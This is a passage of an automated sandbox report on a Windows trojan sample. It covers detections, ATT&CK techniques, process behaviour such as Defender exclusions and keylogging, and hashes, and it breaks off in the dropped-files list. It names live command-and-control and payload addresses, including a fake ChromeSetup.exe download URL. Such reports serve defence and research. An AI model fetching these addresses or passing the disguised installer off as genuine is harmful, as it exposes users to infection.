                      Source: Yara matchFile source: 6.2.FIWszl1A8l.exe.28205bf.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a2b043.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.3fa4ebb.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.a3c1eb.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.41b486b.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.FIWszl1A8l.exe.4142c4b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2570644353.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3537866824.0000000004173000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.1775024265.0000000004111000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3791271776.0000000004310000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3789481950.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2571249345.0000000003F9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.1743428014.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.1775024265.0000000004142000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2529901329.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3786854154.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FIWszl1A8l.exe PID: 7852, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media                      		1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		121
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory11
                      Peripheral Device Discovery                      		Remote Desktop Protocol1
                      Screen Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		Logon Script (Windows)222
                      Process Injection                      		2
                      Obfuscated Files or Information                      		Security Account Manager2
                      File and Directory Discovery                      		SMB/Windows Admin Shares121
                      Input Capture                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing                      		NTDS26
                      System Information Discovery                      		Distributed Component Object Model2
                      Clipboard Data                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets131
                      Security Software Discovery                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials31
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Modify Registry                      		DCSync3
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                      Virtualization/Sandbox Evasion                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                      Indicator Removal                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587335 Sample: FIWszl1A8l.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 59 jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com 2->59 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 7 other signatures 2->71 9 FIWszl1A8l.exe 19 2->9         started        signatures3 process4 dnsIp5 61 8.217.85.20, 18852, 49715, 49746 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 9->61 63 jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com 47.79.66.76, 443, 49751 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 9->63 51 C:\Users\user\Downloads\ChromeSetup.exe, PE32 9->51 dropped 53 C:\Users\user\AppData\...\FIWszl1A8l.exe, PE32 9->53 dropped 55 C:\Users\...\FIWszl1A8l.exe:Zone.Identifier, ASCII 9->55 dropped 57 C:\Users\user\AppData\...\ChromeSetup[1].exe, PE32 9->57 dropped 75 Detected unpacking (overwrites its own PE header) 9->75 77 Adds a directory exclusion to Windows Defender 9->77 14 FIWszl1A8l.exe 3 2 9->14         started        17 cmd.exe 1 9->17         started        19 cmd.exe 1 9->19         started        21 cmd.exe 1 9->21         started        file6 signatures7 process8 signatures9 81 Multi AV Scanner detection for dropped file 14->81 83 Contains functionality to inject threads in other processes 14->83 85 Contains functionality to capture and log keystrokes 14->85 87 Contains functionality to inject code into remote processes 14->87 23 cmd.exe 14->23         started        25 cmd.exe 14->25         started        89 Bypasses PowerShell execution policy 17->89 91 Adds a directory exclusion to Windows Defender 17->91 27 powershell.exe 23 17->27         started        30 conhost.exe 17->30         started        32 powershell.exe 1 22 19->32         started        34 conhost.exe 19->34         started        36 powershell.exe 39 21->36         started        38 conhost.exe 21->38         started        process10 signatures11 40 powershell.exe 23->40         started        43 conhost.exe 23->43         started        45 conhost.exe 25->45         started        47 powershell.exe 25->47         started        79 Loading BitLocker PowerShell Module 27->79 49 WmiPrvSE.exe 27->49         started        process12 signatures13 73 Loading BitLocker PowerShell Module 40->73

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      FIWszl1A8l.exe46%VirustotalBrowse
                      FIWszl1A8l.exe32%ReversingLabsWin32.Trojan.Generic

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ChromeSetup[1].exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\FIWszl1A8l.exe32%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\Downloads\ChromeSetup.exe0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      8.217.85.20:90930%Avira URL Cloudsafe
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe0%Avira URL Cloudsafe
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/0%Avira URL Cloudsafe
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe3E(0%Avira URL Cloudsafe
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exeZ0%Avira URL Cloudsafe
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exeg0%Avira URL Cloudsafe
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exetB0%Avira URL Cloudsafe
                      http://go.microsoftMicrosoft.PowerShell.Archive.psd10%Avira URL Cloudsafe
                      https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exexC0%Avira URL Cloudsafe
                      http://go.microsoftM0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com
                      		47.79.66.76
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        8.217.85.20:9093true
                        • Avira URL Cloud: safe
                        		unknown
                        https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exefalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://html4/loose.dtdChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                          		high
                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1356459970.000000000563C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403002958.000000000597C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1437685680.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://crashpad.chromium.org/ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                                		high
                                https://sectigo.com/CPS0FIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                  		high
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0FIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                    		high
                                    http://ocsp.sectigo.com0FIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1352573033.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004F27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.microsoftpowershell.exe, 0000000D.00000002.1442684525.0000000006FF6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1448148275.00000000081F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A37000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://go.micropowershell.exe, 0000000A.00000002.1392284499.0000000005223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.00000000050E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000005043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.00000000050AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://crashpad.chromium.org/bug/newChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                                                  		high
                                                  https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exegFIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contoso.com/Licensepowershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#FIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                                        		high
                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#FIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                                          		high
                                                          https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe3E(FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://.cssChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                                                            		high
                                                            https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://go.microsoftMicrosoft.PowerShell.Archive.psd1powershell.exe, 00000013.00000002.1679857950.0000000007090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tFIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                                                  		high
                                                                  http://crl.micropowershell.exe, 0000000D.00000002.1416194201.0000000002ACC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1448148275.00000000081F3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1679857950.00000000070AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yFIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                                                      		high
                                                                      https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1352573033.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1648793424.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1648793424.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exetBFIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://m.google.com/devicemanagement/data/apiChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                                                                          		high
                                                                          https://www.remobjects.com/psFIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                                                            		high
                                                                            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#FIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                                                              		high
                                                                              https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exexCFIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://dl.google.com/update2/installers/icons/ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1352573033.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004F27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://support.google.com/installer/ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                                                                                    		high
                                                                                    https://contoso.com/powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1356459970.000000000563C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403002958.000000000597C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1437685680.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.innosetup.com/FIWszl1A8l.exe, FIWszl1A8l.exe.0.drfalse
                                                                                          		high
                                                                                          http://support.google.com/installer/%s?product=%s&error=%dChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                                                                                            		high
                                                                                            https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exeZFIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://go.microsoftMpowershell.exe, 00000013.00000002.1679857950.0000000007090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1352573033.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1648793424.0000000004314000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://.jpgChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                47.79.66.76
                                                                                                		jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.comUnited States
                                                                                                		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                                8.217.85.20
                                                                                                		unknownSingapore
                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                                                                General Information

                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                Analysis ID:1587335
                                                                                                Start date and time:2025-01-10 07:51:06 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 10m 11s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:24
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:FIWszl1A8l.exe
                                                                                                renamed because original name is a hash value
                                                                                                Original Sample Name:f1c0a349ef488c9d2fde3dd7f3c497bd.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@29/27@1/2
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 50%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 86%
                                                                                                • Number of executed functions: 185
                                                                                                • Number of non-executed functions: 226
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                Warnings

                                                                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50, 172.202.163.200
                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7648 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7980 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 8120 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                01:52:03API Interceptor42x Sleep call for process: powershell.exe modified
                                                                                                01:52:33API Interceptor3898127x Sleep call for process: FIWszl1A8l.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                No context

                                                                                                Domains

                                                                                                No context

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC5.elfGet hashmaliciousUnknownBrowse
                                                                                                • 8.209.177.126
                                                                                                2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                                                • 8.217.59.222
                                                                                                https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                                                                • 47.254.187.72
                                                                                                Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                • 8.214.203.178
                                                                                                6.elfGet hashmaliciousUnknownBrowse
                                                                                                • 8.222.188.75
                                                                                                Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 47.246.158.153
                                                                                                123.exeGet hashmaliciousMetasploitBrowse
                                                                                                • 47.90.142.15
                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                • 8.222.72.249
                                                                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                • 8.219.224.17
                                                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                                                • 8.220.214.139
                                                                                                VODAFONE-TRANSIT-ASVodafoneNZLtdNZarmv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                • 47.79.173.144
                                                                                                arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 121.74.70.74
                                                                                                leBwnyHIgx.exeGet hashmaliciousGhostRatBrowse
                                                                                                • 47.79.48.230
                                                                                                miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                • 47.78.226.190
                                                                                                miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 118.95.51.101
                                                                                                z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                • 121.74.70.74
                                                                                                armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                • 118.95.125.90
                                                                                                HGwpjJUqhW.exeGet hashmaliciousGhostRatBrowse
                                                                                                • 47.79.48.211
                                                                                                1731043030539.exeGet hashmaliciousReflectiveLoaderBrowse
                                                                                                • 47.76.199.218
                                                                                                armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                • 47.78.236.90

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                37f463bf4616ecd445d4a1937da06e192873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                                                • 47.79.66.76
                                                                                                n41dQbiw1Y.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                • 47.79.66.76
                                                                                                stage3.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                • 47.79.66.76
                                                                                                1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                • 47.79.66.76
                                                                                                drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                • 47.79.66.76
                                                                                                DyM4yXX.exeGet hashmaliciousVidarBrowse
                                                                                                • 47.79.66.76
                                                                                                http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                • 47.79.66.76
                                                                                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                • 47.79.66.76
                                                                                                xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                • 47.79.66.76
                                                                                                DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                • 47.79.66.76

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ChromeSetup[1].exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):10384768
                                                                                                Entropy (8bit):6.780997055675606
                                                                                                Encrypted:false
                                                                                                SSDEEP:196608:VpjYZ94Z6AhJ5NtGdDDIauMJZZCgdaTos7s4QA/rmYeus5dvXCKsJdVV3qHDYyYL:VpjwKZF5LGdDDvJZZCgdwbcAheus5xXU
                                                                                                MD5:8C6E8B9F0955CB1ACD92C7C43A8899ED
                                                                                                SHA1:42885DBB8DC515E8D706C9E2085245548E44373E
                                                                                                SHA-256:2CB24656EF0CA18A905190C553C2451D44FC09EF9261976450EFDF8C72E8E582
                                                                                                SHA-512:154210EC82DB87C5598F699F84DA4C5F7105676D089F54DB599D086850895BCBB69C7DD1EE9372E09AA1C77EDFEBA644CE4EE810CB961294844984355F245F98
                                                                                                Malicious:false
                                                                                                Antivirus:
